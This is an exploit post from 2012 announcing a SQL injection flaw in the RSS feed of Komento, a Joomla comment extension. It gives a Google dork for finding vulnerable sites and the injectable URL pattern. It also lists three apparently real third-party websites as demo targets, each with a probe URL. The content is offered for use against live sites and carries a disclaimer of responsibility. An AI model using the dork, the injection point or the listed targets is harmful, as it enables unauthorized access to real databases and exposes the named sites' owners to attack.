Home / exploits Joomla Komento SQL Injection
Posted on 26 August 2012
################################################################################### # Exploit Title: Joomla component komento Sql Inection Vulnerability # # Google Dork:inurl:component/komento/ # # Date: 08/24/2012 # # Author: Crim3R # # Vendor Home : http://stackideas.com/komento.html # # Tested on: all # ################################################################################### $ $ Author will be not responsible for any damage. $ ################################################################################### ======================================== Komento is a lightweight Joomla comment extension to manage user comments in articles, blogs, and more. Vulnerability is in Rss Feed : component/komento/?view=rss&format=feed&component=com_content&cid=[id][sql injection] D3M0 : http://keep-it-sexy.com/component/komento/rss?format=feed&component=com_content&cid=152%27 http://www.bonyannew.ir/component/komento/?view=rss&format=feed&component=com_content&cid=52%27 http://www.plazaris.com/component/komento/?view=rss&format=feed&component=com_content&cid=93%27 ===============Crim3R@Att.Net=========== $home = %00 thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir
